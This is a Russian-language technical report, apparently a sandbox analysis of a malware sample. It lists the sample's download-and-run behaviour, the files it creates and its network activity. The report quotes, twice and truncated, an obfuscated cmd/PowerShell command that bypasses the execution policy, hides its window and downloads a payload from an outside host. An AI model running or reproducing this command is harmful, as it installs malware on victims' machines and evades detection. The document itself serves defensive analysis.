Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "pOweRs^h^e^ll.exe -e^X^E^cu^tIO^NP^Ol^ICy BY^pass -n^oPr^ofIl^e^ -W^in^dOws^tyl^E^ Hi^D^dEN (^n^eW-^ObJect sy^StEm.NE^T.weBcl^ienT).D^oWNlO^aDfIle('http://aloepolera.top/r...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "pOweRs^h^e^ll.exe -e^X^E^cu^tIO^NP^Ol^ICy BY^pass -n^oPr^ofIl^e^ -W^in^dOws^tyl^E^ Hi^D^dEN (^n^eW-^ObJect sy^StEm.NE^T.weBcl^ienT).D^oWNlO^aDfIle('http://aloepolera.top/r...' (со скрытым окном)
